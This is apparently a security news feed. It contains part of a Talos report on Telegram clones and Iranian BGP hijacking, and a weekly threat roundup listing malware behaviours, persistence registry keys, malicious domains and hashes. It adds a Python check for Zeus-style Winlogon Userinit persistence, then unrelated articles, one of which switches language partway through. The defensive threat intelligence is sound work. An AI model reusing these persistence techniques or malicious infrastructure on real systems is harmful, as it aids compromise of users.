Theoretically, this announcement could have been one component of an operation to compromise communications with Telegram servers. The hijack led to some Telegram traffic being sent through an Iranian telecommunications provider. Other nation-state actors have used this technique to deliver malware, as other security researchers documented two months earlier, in May 2018. Once traffic is routed through a desired ISP, it can be inspected and modified; since Telegram's client-server traffic is itself encrypted, an on-path position by itself mainly yields connection metadata and the ability to block or degrade sessions, unless the actor can also break or bypass that encryption. Open-source reporting suggests that Iran-based telecommunications providers have previously cooperated with Iranian government requests to obtain communications; one article suggests they provided government officials with the Telegram SMS verification codes needed to gain access to Telegram accounts.
This capability would be attractive because it could allow the actors to route traffic from neighboring ASNs through Iran, giving them access to traffic from devices in nearby countries and a way to compromise users of non-Iranian telecommunications providers.
The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.
Conclusions
The three techniques discussed here are not the only ones state-sponsored actors can use to deploy surveillance mechanisms against their own citizens. Mass internet firewalling and surveillance deployments have been in the news before, and some of those campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. Yet we found several Telegram clones, each with several thousand installations, that contact IP addresses located in Iran, some of which advertise that they can circumvent the ban. Running these applications is not illegal, but it gives their operators total control over the messaging application and, to some extent, over users' devices.
The long-running activity of groups like Charming Kitten, even when it relies on classic phishing techniques, remains effective against users who are not very security-aware. Given that the common denominator of all these activities was citizenship, it is understandable that the vast majority of any country's population will not be as security-educated as a cybersecurity professional, so even this classic technique can be highly effective.
While it is impossible for Talos to determine precisely the intent behind the July 30 routing update messages, Talos assesses with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely that four update messages would be distributed at exactly the same time to route two different Telegram ranges through four different subnets all associated with one ASN, 58224. This assessment also considers open-source reporting on Iran's complicated history with Telegram, from laws banning its use to reports of outages caused by Telegram's IP addresses being blocked in Iran.
Aside from the victims and the applications, Talos was unable to find any solid link between these events. This investigation focused on Iran because of the current ban on Telegram, but these techniques could be used by any malicious actor, with or without state sponsorship. Talos assesses with high confidence that users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.
IOC
Domains
talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
30dn[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values
8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d - followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 - ozvdarozv.apk

New Intel CPU Flaw Exploits Hyper-Threading to Steal Encrypted Data

THN - Sun, 04/11/2018 - 07:24
A team of security researchers has discovered another serious side-channel vulnerability in Intel CPUs that could allow an attacker to sniff out sensitive protected data, like passwords and cryptographic keys, from other processes running in the same CPU core with simultaneous multi-threading feature enabled. The vulnerability, codenamed PortSmash (CVE-2018-5407), has joined the list of other

Threat Roundup for Oct. 26 to Nov. 2

Talos - Fri, 02/11/2018 - 16:03


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 02. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with each cluster; the lists in this blog post are limited to 25 hashes per cluster. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Zbot-6732674-0
    Malware
    Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
     
  • Win.Malware.Sivis-6734391-0
    Malware
    Sivis is a type of trojan that is usually downloaded from the internet and installed by unsuspecting users. This trojan variant also includes sandbox evasion logic. It has the ability to move numerous files to the Recycle Bin.
     
  • Win.Malware.Explorerhijack-6734396-0
    Malware
    A hijacker could use this malware to change the user's browser's home page, redirect the user to suspicious websites, and then lead them to advertisements and commercial content that generates pay-per-click revenue for its developers.
     
  • Xls.Malware.Cwsp-6735643-0
    Malware
    This is an Excel-based downloader that uses PowerShell to retrieve the next stage of the malware executable. Microsoft Office displays a warning to the user before the payload actually gets activated.
     
  • Win.Trojan.Mikey-6735890-0
    Trojan
    This cluster focuses on malware that creates a specific cluster so that it can achieve persistence. The samples use anti-analysis tricks to complicate analysis. The family is known for its plugin architecture and intense network activity. This week, Mikey used the AppWizard packaging system, which is based on common Microsoft code and uses the Microsoft Foundation Classes (MFC) to start a simple application. Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.
     
Threats
Win.Malware.Zbot-6732674-0
Indicators of Compromise
Registry Keys
  • <HKLM>\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
    • Value Name: userinit
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\ntos.exe
File Hashes
  • 0105bb0a81ceb78f84de07f7336a6ecdd95721545b3e47c96ae45f94a8fe8506
  • 0114885e69a066a72f12eb475c9ae36e0851309ce6902a547dd60915ab785523
  • 01be29f0973f96218bf0554f2212ee60fe8563a9fa5e9f1cc04b948a02a5989a
  • 0280026374e8bc24bd0987abde9c8ded202bc489e0f718c2fbd87d541f2003e0
  • 03262248439bc3ed3af3cc12a50d3595a0230b6a01fd3c6e34838750a01a4b72
  • 03480a5dda4243eec0e9826a386729670c50c9cdcfd12109febf16695e7302ce
  • 03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb
  • 03c2c34bd542dde2d600697bb658399498be9ff74614ab938adb3f77a4183c4c
  • 0462f5a9a36956eb62b958203d66e1ad83268502f7ee6a2676e47d3829db1e03
  • 06c57ae21c9f839895f847a5d8895fdc89e878a615565772246c94887caaf6cb
  • 075b5ad9b36d79b3b14ad43decabdd7f07fbd3d428e890a14ee2af4969ba49e5
  • 08866b56758d4c7b783af2faa3465a9c3dcb2621b19ded098ccb17e25e4f685a
  • 08db11f50735c3f4d34d308bc190ae8db0cc6b291090716781ced208b13743fa
  • 0a00e118d1917356a4598d2e5f3a96f184726cb37e6be4cfa70ad233fcf5be8a
  • 0a0e93af895754435be151f0f09d3fcd542661c9e48314a82bfa4853be9212fe
  • 0a4d7fbd10835ba00bd6518598f0c3a4670207e52e4c8c57a5500f0c4059a017
  • 0a963367e108b56e58559846236f1896adcca5ec6e324330739e3b45d436e1dd
  • 0b675493051c7f99878bca3510c5054bbc071612557acb008e9ae8980c6364ed
  • 0b7143f5062cada3d26a97f59b10ddf8e2a73ea70dc97c7cb55a5ceef7e7e5d8
  • 0b76777a484d6e0304bfc0b0c06576a51bca2a5cf6a648dfdf67f296301af3d4
  • 0bc190d365d58acc24ec202637d87296c69c9f2d2dc4e7120d8f3b61ffc584bc
  • 0c4533fd8ae2a9629f474373ce2697059e978e8f5945b4421d092a7052b9c64c
  • 0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36
  • 0ef146b745e8b57ed0f3b0cd888f650fb8510670731e5c01419e13722178d1d9
  • 114f30f079e04714958728d7364b706dd8e88a241bd0771326d10c445d4fc95c
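Zeus-family droppers commonly persist by appending their executable to the Winlogon Userinit value, which is why this cluster's indicators pair that registry value with %WinDir%\SysWOW64\ntos.exe. The check below is an added example, not Talos code: given a Userinit string as read from the registry, it expands the environment-style variables, normalizes each entry and reports anything other than the legitimate userinit.exe. The variable table and both sample values are constructed; the file name evil.exe used in testing is hypothetical.

```python
import ntpath
import re

# Only the Windows logon helper belongs in Userinit. Compare on the expanded,
# lower-cased full path so %SystemRoot% and C:\Windows are treated alike.
LEGITIMATE_USERINIT = r"c:\windows\system32\userinit.exe"

# Constructed table matching a default install at C:\Windows. On a live host
# substitute os.environ so the actual SystemRoot is used.
WINDOWS_VARS = {
    "systemroot": r"C:\Windows",
    "windir": r"C:\Windows",
}

_VAR_RE = re.compile(r"%([^%]+)%")


def expand(path, variables=WINDOWS_VARS):
    """Expand %VAR% references case-insensitively, leaving unknown ones in place."""
    return _VAR_RE.sub(lambda m: variables.get(m.group(1).lower(), m.group(0)), path)


def parse_userinit(value):
    """Split a Userinit registry string into cleaned, expanded entries.

    Windows tolerates a trailing comma and surrounding whitespace, and entries
    may be quoted; empty entries are dropped.
    """
    entries = []
    for raw in value.split(","):
        entry = raw.strip().strip('"')
        if entry:
            entries.append(ntpath.normpath(expand(entry)))
    return entries


def suspicious_userinit_entries(value):
    """Return every Userinit entry that is not the legitimate userinit.exe.

    A bare 'userinit.exe' (no directory) is resolved by Windows from System32
    and is accepted; anything else, notably a SysWOW64 executable such as the
    ntos.exe in the Zbot indicators, is returned for triage.
    """
    flagged = []
    for entry in parse_userinit(value):
        lowered = entry.lower()
        if lowered == LEGITIMATE_USERINIT or lowered == "userinit.exe":
            continue
        flagged.append(entry)
    return flagged


# Constructed sample values: a clean default and an infected one in the shape
# Zeus-family droppers produce.
CLEAN_USERINIT = r"C:\Windows\system32\userinit.exe,"
INFECTED_USERINIT = r"C:\Windows\system32\userinit.exe,%SystemRoot%\SysWOW64\ntos.exe,"


if __name__ == "__main__":
    for label, value in (("clean", CLEAN_USERINIT), ("infected", INFECTED_USERINIT)):
        print(label, suspicious_userinit_entries(value) or "ok")
```

On a Windows host the value is read with `winreg.QueryValueEx(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"), "Userinit")[0]`; any flagged path should then be hashed and compared against the list above, since a Userinit entry on its own is an indicator, not proof of infection.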

Coverage
Screenshots of Detection
AMP

ThreatGrid

Win.Malware.Sivis-6734391-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \$Recycle.Bin\<USER-SID>\$RZ7KADN.txt
  • \$Recycle.Bin\<USER-SID>\$RYGDGS7.lnk
  • %AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db
File Hashes
  • 2073825ad497c12861800c93527e49e8aa4afafe77d1a7af2922ab707c4b258e
  • 2c43a96efe6f36ef0e1e1ca7f4dfe34c83bdd1d99090a056d43955e70bae719f
  • 2ff58a8b69dcb0dbb1ef63430a925068d586860c84faa583988b92e2bb87ef25
  • 30a9b4c8db8eae33a1e9c35f6441e171cb8059a0f6c34bc8d377e064f3000008
  • 32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d
  • 32fb050134eefd9bba3f5a1d31c9727c0a25760e8b2342385b24b20a253e9512
  • 34c5950ff21c25a4acbc1801f881d205ba2cae42333bb04358cf5117eef645b2
  • 447e4f61b3e3a5ccf116346d228d1b80328a63e54fc71398e4894d70c22ff51d
  • 4d6ac5ccca2bab50f296a4e34a7bed16131f01fdf6864c2bee8efbfea449697b
  • 51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab
  • 581391e344bda3539189aef8252556f916bf27333e755765641a1485844b884f
  • 66ada213ce8d9756c1c711d216d45ef8cc84586a1dc46213ce8275d4f8a7d08f
  • 7d0ab4517139c8347e39af92cf8dafb9c71e80a8848cea25d7e4598292753fac
  • 7f49ac352ec83b003ca00b29acafdf5c08132f0bd060151312157773e06a887d
  • 8564af9b09f0ade9b372d76a0d53355587b28cc89afec83b9287cebe6dbce148
  • 8cca573e22a563ae4074007c9b5c5abd11316a0235f206242baf4936f3cff4fb
  • 91487940c217c106a1f70ea4f850db083396a8fd5c37e81c47d4cd01ef269906
  • 9813d3fa86989ca43ecc0db5684e642823abebca58161d8676276349bb5c53ea
  • b3be19db0aa19fc9588cb90d0ee5c39ae124e797b82ba1eeb02ba0b82c9a55f8
  • beb78637a890b73e150cc67b1c51108dc89e7b3e491ed22cc81695eda729e10f
  • c405942083f1d75a6de07f9270e94594cfd99b59c774f22bd2c214715822a851
  • c5405c94a49bd14155027aea5722bf253eeedd1a3d0d1d73a2580adb70a6def7
  • cc542bacf782757a362d3b6cfc54efe64f8abb860f7c997cf008cc0ae9ffcee6
  • d2f9541628e3178b1e6cead482d9983e1509edd3155244b42ac49f0a6919d690
  • d7ecfd142025e761006a446d1bd68a9f337eaf1f927fbc01fbbe336df39befae

Coverage
Screenshots of Detection
AMP

ThreatGrid

Win.Malware.Explorerhijack-6734396-0
Indicators of Compromise
Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\LogonSoundHasBeenPlayed
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 103[.]235[.]47[.]123
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\347749632.exe
File Hashes
  • 0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8
  • 39ad7614f81cf505be13fb726d9a68585ebcfb4ba3c156e7974e23a71c8254f1
  • 41569db09055ec3bbd900f943c3049b6362be1fc08e73bf9403c6e0a684b5aed
  • 7f25aa88bb56ce9888d3959344307b5c7423f53ef1409f84534dd82f2520eb92
  • 856c90d502181b0297d792c67ab0d5e3d78fac4879e853beab00e10707e1c5dd
  • 99e9c70014473728f7cfac4704c4961cb9cf1e6cb015bb1da6bb095fea13ecaa
  • a4143241cfa447db8fa7d4ec5ef79a6bd0a78b853d8f461f209e1224ea09f34f
  • e957fa484e5b1b1c84a0f4d3e3561686fe6d289f703ec2ff1f4d9fec886e1344
  • f57061d301bce0ecb0b1caf8b0e0de238ecccd4f038f4e9a397ab1cdde57e9a2
  • fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0

Coverage
Screenshots of Detection
AMP

ThreatGrid


Xls.Malware.Cwsp-6735643-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 212[.]58[.]244[.]48
  • 208[.]91[.]197[.]13
Domain Names contacted by malware. Does not indicate maliciousness
  • lalecitinadesoja[.]com
  • downloads[.]bbc[.]co[.]uk
Files and or directories created
  • %LocalAppData%\Temp\1ii4ushk.rdy.ps1
  • %LocalAppData%\Temp\i3iu3ax4.unx.psm1
  • %AppData%\23C.exe
File Hashes
  • 05997180a42ca9c01720b1ee3e759bd1a408c0064bbdac0c72f56c9783102a1f
  • 07a8a906e93699e23b1b7fe6a190edf709d499efdb806a334d63d21e87d47fea
  • 0d4e2eeb6402ecbfed9d9f70a4386ba988d96baa4570944ad7d25fda4e1360b5
  • 1007b22475717247803c61a571c881bf50d93199f21559bfaa2b0651e3e88b99
  • 11cd2e32f5b99a2988d75e7c6b7b372645385fa0b2f266084cf79a674fa87d54
  • 12cb9af05b67398d8e32296f872fcf38485cb5bfb248882a039c901f917744c7
  • 199abec0369aa5b56ccf3e40104dec650c0c621a4bf9fe892cde4c649951d96c
  • 2436eb88be5cb4536470f00aa4e0b2204c938a7ccc1ab1512c51371c056083bb
  • 2b99f6c10d40f9437e4f81c102829e5dd177b7ba83f04d0b09ca13fd35d4f37a
  • 2e1d18fa4a0c1b7f1a840f0cbe366bed742fd882ba5ba7c32177fe4384d3feeb
  • 2fcb4649130e60c9ee30bc0109dd276dfc20b58873098466740c95bae14e8b16
  • 2fda76c3f4db61bd48ffefbe06625cbf33c84c9a99bfb5e4b078efab041786be
  • 4c7833eda85621233fcf983d797da0a473e4d17bc8a6b5572eb475e1132f9604
  • 4cf4a24b619e53b5155e2aa5eebcbd4a935b03bc2a99f703e955d26bfdc89834
  • 522dea36276bb7616dabda4f46e9bd93fb5fac7dc8c035e2677febac8a9ac268
  • 53bfd8dcca2dd1a702c80a92e52b6149c3b6d9dd69cfc616c6ece3931920aa0b
  • 56ee72c3cac7e50c20945307e9f58360e097782ee10a5577323f1cee22caeb3d
  • 5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7
  • 5dfef0b6f4f1b612edf80c8ab5cffc7556677bb07c53934963b550b60cf84474
  • 6534a9d590748b2301a3f804b75fe02ffee39acf82d2dbb93800a3f8923c9934
  • 6b83c696d85d8f467ee9ff306ef266c6b64c8cb4e0aad99f4b5627f6e2dd3c33
  • 6c891decc602dc22ae6084be690674afdb405c5b7072a0e8b46d77ba8e331237
  • 6da86b5ba028ddfd9646da6467cdaca4d698b72b165045561bcf7a65449dba85
  • 7546344c7c370e86f9975710269a9c965104d6084fe4b51d8713c37cd277c2da
  • 75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d

Coverage
Screenshots of Detection
AMP

ThreatGrid

Umbrella

Malware


Win.Trojan.Mikey-6735890-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • qazwsxedc
IP Addresses contacted by malware. Does not indicate maliciousness
  • 52[.]1[.]22[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]easycounter[.]com
Files and or directories created
  • %WinDir%\cer61A0.tmp
  • %TEMP%\adminpak.msi
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe
  • %WinDir%\cluster\clcfgsrv.inf
  • %WinDir%\cluster\cluadmin.exe
File Hashes
  • 04a44c6f9ee4b5f944038452d2669a9915e493f3d4aedd8603af6bcbf9fb157d
  • 075ef3a40de2c10d52140c02fc604654e60eb1231659122640d93884a8f639d8
  • 1ed41ccdce4f7c67dbeb57873ed69a0b53bd8c509a66f391fb4838cd26d32f88
  • 4e8da970321ee8e38f2fe918ce8755ce504d0c54ad579c7a2d388ed65aceca3f
  • 63562fa34ca55cbbc1f007ed6a199b625f277f02487d18c6a9a8e24354af6ea3
  • 72b02849c7cde8ba42dfe04edf18b0ede900c66187a9e38f5d16eaf84ddfbfbe
  • 764947d95583d3a134fc96d6ce06ce4175261d3b9b48d224238367054e187d93
  • 77515fa3f7bea9043e954ac8cb13917edd930d0e5d87f2cbc9fa4d44bd281161
  • 7ea545f0dd17684011d7bbdde7c004faccacd8edb6d011c4e023f2780279ae1f
  • 92e4863e96df84117c1288ceb692823a6d86c0b3a09f29a5cbc4af6a83a03415
  • 9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80
  • a36d16238efb3b5f2ba5e9c23dd1db26a6b08fce8fa1d824e3006bc05f12a75f
  • b63310bff942d0fe4f131fbb777737b110ab630876e784ac843e0c4dcdebde44
  • bdc574d0160c6566738b039122d702a47aa10080b096cc3ca2729a2a5ca5f6f6
  • cf7236e1d8783d00cd54d9d821a1067a2c08cd7cb67b0c091f5826784403f67a
  • d7096f8904ebef796193afca1737f99e65c07ac7cf3c999aa46b5e60428ca006
  • dba090f098676f7f4d5bd9e71a5b24cb1dfc71edb6b8a0dc06082a60730a81d0
  • ed2893a0c58fbfaf73acdd4d7a7c9d8626e8609573739e8f0bf11c88d4b07303
  • f9de2da81894bbde4f6baf5909c3f3f6a5d5fc61a8df97836fb8db14fbdb6006
  • ff453440448d5f950a573ab246092a3c80e33c7c9189d97d15539bf09c48211d

Coverage
Screenshots of Detection
AMP

ThreatGrid


Accused CIA Leaker Faces New Charges of Leaking Information From Prison

THN - Fri, 02/11/2018 - 07:16
Joshua Adam Schulte, a 30-year-old former CIA computer programmer who was indicted over four months ago for masterminding the largest leak of classified information in the agency's history, has now been issued three new charges. The news comes just hours after Schulte wrote a letter to the federal judge presiding over his case, accusing officials at Manhattan Metropolitan Correctional Center of

Apple sold 46.9 million iPhones in the 3rd calendar quarter

MeioBit - Thu, 01/11/2018 - 20:03

On Thursday (Nov. 1) Apple presented its financial report for the fourth fiscal quarter of 2018 (Q4 FY 2018), the period that corresponds to the third calendar quarter of the year, covering July to September. No big surprises: the Cupertino company remains a giant and healthy business.

Let's get to the numbers:

APPLE FINANCIAL REPORT
Period    Q4 FY 2017 (July to September 2017)    Q4 FY 2018 (July to September 2018)    Change
Revenue   US$ 52.58 billion                      US$ 62.9 billion                       +19.63%
Profit    US$ 10.71 billion                      US$ 14.13 billion                      +31.83%

Overall, revenue is up a healthy 19.63% over Q4 FY 2017, and quarterly profit is up a hefty 31.83%, totalling US$ 14.13 billion in Q4 FY 2018. What drove Apple's US$ 62.9 billion in fourth-fiscal-quarter revenue?

Apple Park in June (credit: Toby Harriman)

Below is the sales summary by segment:

APPLE SALES SUMMARY
Segment          Q4 FY 2017 units    Q4 FY 2018 units    Change    Q4 FY 2018 revenue    Change vs Q4 FY 2017
iPhone           46.68 million       46.89 million       +0.45%    US$ 37.185 billion    +28.9%
iPad             10.3 million        9.7 million         -6%       US$ 4.09 billion      -15%
Mac              5.4 million         5.3 million         -2%       US$ 7.4 billion       +3%
Services         -                   -                   -         US$ 9.98 billion      +17%
Other products   -                   -                   -         US$ 4.2 billion       +31%
TOTAL            -                   -                   -         US$ 62.9 billion      -

With smartphone unit sales flat, the iPhone X was the main driver of the year-over-year revenue increase in Apple's fourth fiscal quarter. The average selling price was US$ 793, up 28%; the average price of iPhones sold in Q4 FY 2017 was US$ 618.

iPads saw a steep drop in revenue and, like Macs, a small drop in unit sales. That is normal for durable products, which consumers replace only when they break, and in the Mac's case the competition is fierce. Average selling prices were US$ 422 (-9.8%) for iPads and US$ 1,399 (+5.1%) for Macs.

More than 200 million subscribers to Apple Music, Apple Pay and iCloud brought the Cupertino company US$ 9.98 billion, up 17% over the same quarter a year earlier. Other products (including the iPod line, the Apple Watch and those Beats headphones) accounted for the remaining US$ 4.2 billion of Apple's global revenue in the third calendar quarter of 2018, up 31% over Q4 FY 2017.

Apple is going to stop providing iPhone, Mac, and iPad sales. So nobody will know how sales of the future MacBook Airs or iPad Pros are going. That’s a big change. https://t.co/dumpPmMsjS

— Tom Warren (@tomwarren) November 1, 2018

It's worth remembering that starting next quarter (Q1 FY 2019) Apple will no longer disclose unit sales for iPhones, iPads and Macs. That will make it harder for us enthusiasts to work out the average selling price of the devices sold and speculate about the reasons. Cupertino must have its reasons, just as Microsoft has for hiding Xbox One sales.

Source: 9 to 5 Mac.

The post "Apple sold 46.9 million iPhones in the 3rd calendar quarter" appeared first on Meio Bit.

Two New Bluetooth Chip Flaws Expose Millions of Devices to Remote Attacks

THN - Thu, 01/11/2018 - 16:48
Security researchers have unveiled details of two critical vulnerabilities in Bluetooth Low Energy (BLE) chips embedded in millions of access points and networking devices used by enterprises around the world. Dubbed BleedingBit, the set of two vulnerabilities could allow remote attackers to execute arbitrary code and take full control of vulnerable devices without authentication, including

CyberVets U.S.A.: The mission after transition

Talos - Thu, 01/11/2018 - 16:48
Christopher Marshall, a veteran of the U.S. Navy, currently serves as Director of Cybersecurity Research for Cisco Talos Intelligence Group.

As a veteran of the U.S. Navy, I’ve had the opportunity to use some of the greatest technology this country has to offer — from night vision goggles, to thermal cameras, to radio and satellite command and control equipment — even the care and feeding of nuclear reactors. When it was time for me to transition from the military to the civilian world, my post-military career led me to work for the Cisco Talos Intelligence Group, where I’ve found that many who served are also excellent teammates in the fast-paced, ever-shifting domain of cybersecurity. These men and women exhibit leadership, teamwork, inclusion, integrity, efficiency, and (importantly) the ability to acquire technical prowess. These are highly desirable traits in any industry, especially one that is predicated on trust and a willingness to always learn and evolve.



Within the next few years, we are facing the global reality of nearly 2 million unfilled cybersecurity jobs, which poses a threat to our national security, businesses and the local community. At Cisco, and Talos in particular, we recognize the value veterans bring to the workplace. We strive to create opportunities for the training, hiring and advancement of veterans because of the intangibles they bring with them. A major obstacle we face in that endeavor is how to support the military community as they transition to the civilian workforce at a rate of over 200,000 each year. In November 2016, Virginia announced the Virginia Veterans Cyber Training (VVCT) program, or as we at Cisco call it, CyberVets USA. Leading the partnership alongside Amazon Web Services and (ISC)2, Palo Alto Networks, and Fortinet, Cisco launched a free online entry-level cyber training pilot for 200 veterans who want to work in Virginia’s cybersecurity industry.
Today, we are excited to announce a CyberVets USA program in Talos’ backyard here in Maryland with the help of Lt. Gov. Boyd Rutherford, in conjunction with a proclamation to make this November “Hire-a-Veteran Month.” Additionally, NetApp and the National Development group have joined on for the Maryland program. Developed to address a growing talent gap in the cybersecurity arena, CyberVets USA is an industry partnership of cyber-focused companies offering free training and certifications to the military and veteran community. In collaboration with the Departments of Labor, Commerce, and Veterans Affairs, as well as several of Maryland’s state colleges and universities, this program provides the training needed to develop the extrinsic skills to succeed in the cybersecurity workforce while capitalizing on the intrinsic values that hiring veterans brings to the commercial workforce. (To learn more, click here.)
Additionally, in the near future, Cisco will be launching other programs that include a targeted employer matching program, a proprietary matching engine to map military skills and newly earned certifications, linking veterans to the thousands of jobs posted by any one of Cisco’s 60,000 channel partners across the globe.
With the support of the governor’s office and the state of Maryland, the CyberVets USA program will identify, train, and help find next-generation tech jobs for the veteran and transitioning military population of Maryland, giving the vets their next mission after transition. I am proud to continue my journey with a company dedicated to serving those who served and look forward to welcoming veterans as they join the Cisco team.
To learn more, visit cs.co/CyberVetsUSA.

Sobre martelos, penas, professorinhas e plantadores de feijões

MeioBit - Thu, 01/11/2018 - 14:01

Christa McAuliffe não era uma astronauta. Não sabia pilotar um shuttle, não tinha idéia de como calcular uma órbita, trocar uma unidade AE-35 ou era qualificada para usar um traje espacial. Ela também não era uma cientista. Não conhecia a Equação de Foguetes de Tsiolkovsky, e provavelmente era incapaz de descrever ou entender a mistura de co-polímero polibutadieno-acrilonitrilo usada nos motores auxiliares. Mesmo assim ela iria viajar no Ônibus Espacial.

Christa foi escolhida entre 11 mil candidatos para o programa Professores no Espaço, e era isso que ela era: uma simples professorinha de estudos sociais no ensino fundamental. Ela passaria 6 dias em órbita, mas não descobriria nada, não avançaria a Ciência. Isso a um custo de 65 milhões de dólares, fora o custo de seu treinamento e um ano de salário dos dois empregos que a NASA pagou, quando ela se licenciou para treinar para a missão.

A missão era ser a primeira do programa Professores no Espaço, criado por Ronald Reagan em 1984, e desses US$ 65 milhões ela valia cada centavo.

O trabalho de Christa não era ampliar as fronteiras da Ciência, era muito maior que isso: ela estava lá para inspirar as novas gerações, reacender nas crianças a centelha da curiosidade e da exploração, que os adultos e o sistema educacional tão eficientemente cuida de apagar assim que pode.

No Brasil acha-se que investir em educação básica é comprar tijolo e construir escola, sem se preocupar com detalhes como o salário do professor ou se vai ter dinheiro pra comprar giz. Nos EUA há (ou havia) uma preocupação com o processo como um todo, começando lá bem cedo com as crianças.

Quando o Sputnik atravessou incólume o céu dos EUA, houve uma verdadeira revolução com bilhões de dólares direcionados para escolas e universidades. A Corrida Espacial seria vencida pela tecnologia.

The US focus is on investing billions of dollars in STEM (Science, Technology, Engineering and Mathematics), and Christa McAuliffe's trip was part of that investment. A government with vision understands that to get something done you need people who want to do it, and Science and Exploration depend on new generations following the path opened by the earlier ones. Christa was going to create the scientists of the future.

Inspiring children toward Science is so important that at the White House Science Fair the most powerful man in the world kneels down to examine a robot built by students.

Many people would say it is a waste of the US president's time to closely follow a science fair that will not discover anything new, but that is not the point. When Homer Hickam (whose story you can get to know in the excellent film and book October Sky) went to present his rocket at the National Science Fair in 1960, he got lost in the building looking for Wernher von Braun. When he got back, von Braun had already passed by his project's table and declared that "that was the best rocket he had ever seen outside Cape Canaveral".

Hickam, the son of a miner, with everything pointing to him living and dying in the irrelevant town of Coalwood, WV, graduated in engineering and went to work at NASA, not only as an engineer but as an astronaut trainer as well.

To short-sighted people it makes no sense for the government to spend a fortune on a science fair for children, and, in the middle of the space race, for Wernher von Braun to waste a whole day looking at children's projects.

Fortunately there are also many people who do not think that way, and who see science outreach as something strategic for their countries and for humanity as a whole. It is, incidentally, the only earthbound job astronauts do not complain about. Day to day they are obliged to deal with paperwork, sit through endless meetings and play politics, but when they get lucky they are sent to visit schools and museums, receive children, answer questions and tell their adventures.

Does it work? Very well: the current generation had the previous one as idols, and look at this photo of children listening to Jim Lovell at a museum:

I would not be surprised if, 20 years from now, the little girl next to the boy hugging his folder were commanding a SpaceX ship and landing on Mars. Her expression says it all.

